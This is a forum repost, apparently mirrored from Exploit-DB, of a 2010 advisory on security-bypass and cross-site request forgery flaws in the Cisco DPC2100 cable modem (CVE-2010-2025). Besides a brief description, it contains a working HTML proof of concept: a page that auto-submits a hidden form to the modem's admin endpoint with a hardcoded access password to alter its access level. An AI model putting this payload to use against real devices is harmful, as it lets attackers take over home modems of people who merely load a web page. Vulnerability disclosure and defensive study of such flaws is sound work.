Cisco DPC2100 2.0.2 r1256-060303 - Multiple Security Bypass / Cross-Site Request Forgery Vulnerabilities | Gerki

Exploiter

Хакер

21 Дек 2022

EDB-ID: 34033

Проверка EDB

Пройдено

Автор: DAN ROSENBERG

Тип уязвимости: REMOTE

Платформа: HARDWARE

CVE: cve-2010-2025

Дата публикации: 2010-05-24

HTML:

source: https://www.securityfocus.com/bid/40346/info

Cisco DPC2100 (formerly Scientific Atlanta DPC2100) is prone to multiple security-bypass and cross-site request-forgery vulnerabilities.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration settings, modify device firmware, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

Firmware versions prior to 2.0.2.r1256-100324as are vulnerable. 

<html> <head> <title>Test for CSRF vulnerability in WebSTAR modems</title> </head> <body> <form name="csrf" method="post" action="http://192.168.100.1/goform/_aslvl"> <input type="hidden" name="SAAccessLevel" value="0"> <input type="hidden" name="SAPassword" value="W2402"> </form> <script>document.csrf.submit()</script> </body> </html>

Источник: www.exploit-db.com

Поиск

Exploit Cisco DPC2100 2.0.2 r1256-060303 - Multiple Security Bypass / Cross-Site Request Forgery Vulnerabilities

Exploiter

Похожие темы